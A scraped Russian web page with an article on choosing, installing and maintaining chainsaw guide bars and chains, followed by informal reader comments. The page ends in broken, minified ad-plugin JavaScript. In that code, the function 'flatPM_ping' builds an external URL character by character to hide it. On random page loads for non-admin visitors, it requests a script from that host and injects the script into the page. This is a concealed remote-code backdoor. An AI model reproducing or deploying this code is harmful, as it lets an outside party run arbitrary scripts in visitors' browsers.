Наиболее востребованный шаг звездочки и пильной цепи для пил мощностью до 3-х л.с. — 0,325 дюйма. Для профессиональной бензопильной техники характерно применение шага 3/8 дюйма.

Ведомая звездочка шины централизованно не смазывается. Этот недостаток компенсируется высоким качеством подшипника, который необходимо намазывать через каждые 8-10 часов наработки. Полноценная замена звездочки шины ведомой, возможна только в оборудованной мастерской.

Критерии выбора шины по качественным характеристикам

Унифицированные по посадочным размерам шины представлены в небольшом ассортименте. Как правило, каждый производитель использует собственные стандарты, что исключает возможность эксплуатации бензопилы с пильным оборудованием других брендов.

  • Отпускная цена направляющих шин определяется размерами, качеством материала и известностью бренда. Самая дорогая наиболее качественная и долговечная в работе продукция ведущих производителей.
  • Высокая стоимость фирменных шин в полной мере компенсируется высокой износостойкостью и продолжительным эксплуатационным ресурсом.
  • В среднем ценовом диапазоне – ассортимент шин бюджетного уровня, которыми комплектуются бензо- и электропилы бытового класса. При грамотной эксплуатации и квалифицированном обслуживании, шины категории Стандарт вырабатывают назначенный производителем ресурс с большим превышением.

Менее популярны дешевые недолговечные в эксплуатации шины китайского производства, которые устанавливаются на бензопилы минимального ценового диапазона. Значительная часть такой продукции поступает в продажу под торговыми марками известных брендов.

Как исключить возможные риски приобретения шинного контрафакта?

В информационном поле приводятся признаки, по которым несложно отличить оригинальную брендовую бензопилу от самой достоверной подделки. Что касается шин, то их достоинства и недостатки проявляются непосредственно в эксплуатации.

На отечественном рынке бытовой техники около 15% всего объема продаж бензопильных комплектующих составляет неизвестного происхождения третьесортный контрафакт, вырабатывающий стандартный ресурс в лучшем случае наполовину.

Эксплуатировать бензопилу в комплекте с поддельной шиной и цепью экономически невыгодно и небезопасно. Значительная часть травмоопасных ситуаций создается при использовании шинного и цепного фальсификата.

Купить качественную и долговечную фирменную шину нужной модели, без существенных рисков можно в фирменной торговой точке или представительстве лицензированной дилерской компании. При отсутствии такой возможности следует воспользоваться услугами солидного, заслужившего доверие покупателей интернет магазина.

Лидеры потребительского спроса

В процессе естественного отбора первые строчки рейтингов продаж заняла продукция ведущих европейских и азиатских производителей бензопильного оборудования. Максимальный спрос на комплектующие торговых марок Штиль, Хускварна, Макита, и ряда других.

Во всех отношениях отлично зарекомендовала себя шина Oregon, которая в разных модификациях комплектует съемное оборудование пил среднего и более высокого ценового уровня.

Конструктивные особенности бытовых и профессиональных шин

Конструкция современных пильных гарнитур постоянно совершенствуется. В результате частичной модернизации была разработана так называемая узкая шина.

Конструкционно такие модели отличаются формой наконечника, предотвращающего обратный удар при входе гарнитуры в пропил. Бензопильная техника бытового класса в большинстве своем комплектуется узкими шинами. Широкий носок — это характерная особенность шины, предназначенной для распиловочных работ повышенной сложности, а также бензопил профессиональной категории.

Выбор длины шины с учетом мощности привода

Длина новой направляющей шины определяется мощностью и величиной коэффициента крутящего момента силового агрегата.

  • Модели бензопил малого и среднего мощностного диапазона комплектуются шинами длиной от 30 до 40 см.
  • Более длинные пильные комплекты создают на двигатель и кинематику инструмента избыточные нагрузки, которые отрицательно отражаются на его тяговых характеристиках и долговечности эксплуатации.
  • В прилагаемом руководстве по применению указана рекомендуемая длина направляющей шины. Это означает, что не исключается установка более короткой гарнитуры, но имеется ряд ограничений по работе инструмента с шиной увеличенной длины.

Бензопильная техника профессионального уровня оснащается силовыми агрегатами, мощность которых позволяет использовать преимущества шин длиной до 75 см. Зачастую размер шины в сантиметрах и дюймах наносится на ее боковую плоскость.

Рекомендации по продлению эксплуатационного ресурса

Примерный срок эксплуатации фирменной шины равняется суммарному ресурсу 3-х качественных пильных цепей, приводная звездочка меняется по состоянию. Специалисты рекомендуют использовать в работе комплект из нескольких цепей.

Такой способ позволяет уменьшить потери рабочего времени, которое расходуется на периодическую заточку цепей, а также оптимизировать износ пильного механизма в целом. Ускоренные износы шин — это следствие неквалифицированного обслуживания бензопилы и ее неграмотной эксплуатации.

Основные факторы досрочного выхода шины из строя:

  • инициирующее быструю выработку паза и хвостовиков чрезмерное натяжение цепи или несоответствие ее шага характеристикам венца ведущей звездочки;
  • приложение значительных усилий при распиловке твердой или мерзлой древесины;
  • греется шина и интенсивно изнашивается из-за отсутствия подачи смазки, вследствие неисправности или неправильной регулировки штатного маслонасоса;
  • экономия средств на применении некачественного цепного масла или масляных суррогатов типа отработки.

Форсированный расход ресурса пильной гарнитуры имеет место при попадании в нее грунта или песка, работе новой цепи на изношенном венце ведущей звездочки.

Установка шины и цепи

Демонтаж шины производится для очистки маслопровода, проверки технического состояния или замены. Последовательность работы расписана в инструкции по эксплуатации. По завершению установки следует убедиться в отсутствии люфта и затяжке резьбового крепежа.

При наличии определенных навыков, для демонтажа и установки новой или заточенной цепи требуется всего несколько минут. Технология предписывает включение блокировки несанкционированного запуска и в ряде случаев, механизма аварийной остановки.

  • В зависимости от конструкции натяжного устройства, цепь ослабляется до нужной степени вращением регулировочного винта или установочного диска, до свободного выхода хвостовиков из паза направляющей шины.
  • После проверки направления вращения, хвостовики новой цепи заводятся в направляющую проточку паз и на венец ведущей звездочки. Натяжение производится в обратном порядке.
  • Для проверки степени натяжения достаточно оттянуть цепь в середине шины. Выход хвостовика звена в этом месте не должен превышать 2/3 его высоты. Правильно натянутая цепь должна перемещаться по шине от небольшого усилия.

После установки и регулировки пильной гарнитуры желательно запустить двигатель и выдержать пилу на средних оборотах на протяжении нескольких минут. На протяжении этого времени можно проверить работу системы смазки.

После выключения силового агрегата необходимо включить блокировку запуска и проверить гарнитуру на отсутствие местного перегрева шины и изменения степени натяжения цепи.

Причины неровного распила

В любительской бензопильной практике возникает много вопросов, связанных с уходом пропила в ту или иную сторону. Такая неисправность создает существенные неудобства при использовании бензопилы в технологиях деревянного строительства.

Причина этого явления в малозаметной для глаза деформации шины, неправильной заточке или неравномерном износе режущих звеньев цепи. Если профессиональная доводка цепи положительного результата не дала, проблема устраняется заменой всего комплекта.

Выбор размера пильной шины

Почему то очень часто люди покупая пилу с 35(см) шиной (14 дюймов) считают , что это мало .

На практике же нужно знать, чем длиннее шина тем меньше мощность в расчете на один пильный зуб цепи. И наоборот .

На 35 шине (14 дюймов), 8 — рабочих пильных зубов = 0,19 кВт мощности на зуб. На 40 шине (16 дюймов) — 9 — рабочих пильных зубов = 0,17 кВт мощности на зуб, что на 10% меньше. (Расчет сделан для пилы мощностью 1,5 кВт. Мощность делим на количество рабочих зубьев )

Примечание: это верно при условии, что будешь пилить «Секвойю» и в работе задействована вся длина шины. Чаще всего в домашнем хозяйстве пил идет четырьмя пятью зубами.

Я думаю, если бы на фотке дерево сделало «ам», это был бы эпик фейл )))

это фиаско, братан

напарил тут! с подворотами не туда

Подворот не туда

Этого часто мало, особенно когда нужно пилить балки/брёвна под углом.

Также хочу заметить, что производитель, как правило, указывает рекомендуемый размер шины для каждой пилы. Установка шины большего размера приводит к увеличению нагрузки на двигатель и цепной барабан, что уменьшает их ресурс.

Есть некоторый нюанс, практика показала удобство длинной шины (70 см) при очистке стволов от сучьев, спина меньше устает (по сравнению с 40 см) и баланс пилы не сильно страдает, специально провели эксперимент на 260 штиле. Да и на валочниках (хусках 365 и 272) длинная шина (70см) вполне хорошо себя зарекомендовала.

Безусловно у тех кто использует пилы профессионально свой подход к выбору инструмента и оснастки. и у них надо обязательно учится , что к стати мы и делаем. Но на 180- й для дачи лучше 70 шину не ставить )))

А их как правило и не выпускают под этим пилы, там паз цепи 1,3 мм и шины в основном 30-40 см в продаже есть. Если только какой не оригинал подбирать. Но если даже взять 180 или 230 с 40см шиной то для большинства этого хватит за глаза и деревья на даче попилить и дров для бани заготовить и дерево упавшее на дорогу в лесу распилить. И 40 см будет наиболее универсальным размером, из плюсов на нее можно найти не очень дорогую твердосплавную цепь. Самое главное следить за остротой цепи и чистотой фильтра, это влияет значительно сильнее нежели заявленная мощность пилы.

есть цепи с твердосплавными зубьями, но дорого, шо ппц. штиль рапид дуро, в районе 9000р за 72 звена 3/8 ) на ёбе можно дешевле сторговать

Нет, просто отламываются зубья. Они хорошо себя зарекомендовали на грязной древесине, но оправданы только на маленьких пилах, для больших шин цена уж больно конская, проще иметь несколько орегоновских запасных цепей, они хоть точатся станком легко и цена не кусается.

Разница в стоимости по цепи в 50 звеньев примерно в три раза: 500 р обыкновенная — 1500 р победитовая.

У меня первая победитовая цепь стояла на пиле 3 года, не снимая и без заточек. Но я работаю любительски. ))) только на даче, строил баню + дрова. Сейчас купил вторую. Мне удобно , что не надо каждый раз поправлять напильником и носить в заточку . поставил и забыл. Но по гвоздям не пилил, крайне редко, и всегда за этим смотрю . Победит в принципе не предназначен для пиления металла.

ну а как ты хотел?) это же не адамантий, что бы не снашиваться совсем

изначально у нее расчет не на долговечность, а для работ с «грязным» деревом на спасательных операциях, пожарах, завалах.

Хер ли Медведев на фото делает?

что то не так с пикабу

где все эти шутки про омномном и прифотошопленные к дереву очи.

Ну так сколько надо мощей на зуб?

Какого то конкретного рекомендуемого показателя нет, все зависит от вида работ.

Никогда не понимал что творилось в голове у Американцев когда они вырубали реликтовый лес.

Они коренных жителей извели, что уж про лес говорить.

Тут ведь речь идет больше о бытовом использовании, а не о профессиональном. Ведь если Вы соорудили пилораму на базе бензопилы, то Вы явно понимаете с какой стороны к ней подходить. Дело в том, что очень часто человек покупает пилу на дачу не для валки деревьев, а сучья пообпиливать на яблонях, и, максимум, дровишек напилить на три зимних приезда, а хочет себе пилу на 2,5-3 кВт профессиональную, потому что круто, мощно и надежно. На вопрос — для чего? Ну, чтобы было. В итоге покупает себе стандартную бытовуху — и это не хуска 140 или штиль 160, а какой-нибудь китайский ноунейм, ставит на нее максимально длинную шину и урабатывает нормальный инструмент за пару сезонов.

китайский ноунейм — нормальный инструмент? Ну вы, батенька, загнули)))

Оно, знаете ли, раз на раз не приходится. Лично я на своем опыте убедился, что если китаец работает нормально около полугода, ну если сознательно его не урезать, то будет служить долго, если в первые месяцы начал хуевничать, то работать не будет. Поэтому, порой, в соотношении цена/качество можно наткнуться на весьма неплохой инструмент. Не штиль, конечно, не макита и не хускварна и даже не олео-мак, но работать хорошо. Не в экстазе, как крутыми пилами, но хорошо.

Вооот)) Согласен полностью, китайские пилы это лотерея — 50/50, либо будет работать нормально, либо максимум один сезон. Я у нас в магазине часто с владельцами китайцев разговариваю. Бегают, ищут запчасти на этот мусор. но бывают и позитивные истории.

Я имел дело с ЕСО CSP-150 — полный аналог 160 штиля. Неплохая пила за свои деньги. Бывало даже мужики брали спецом пилу целую, чтобы штиля своего подлатать — детальки все полностью идентичные. Правда, как настоящие китайцы, заводятся 4 из 5))

хз, раньше китайцы были лучше, а сейчас да- есть те, которые 10 из 10 не заводятся, пока карбюратор не настроишь. Да и люди, покупая штиль/хускварну, потом покупают китайские расходники да запчасти с возгласами- 4к за поршневую- дорого.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика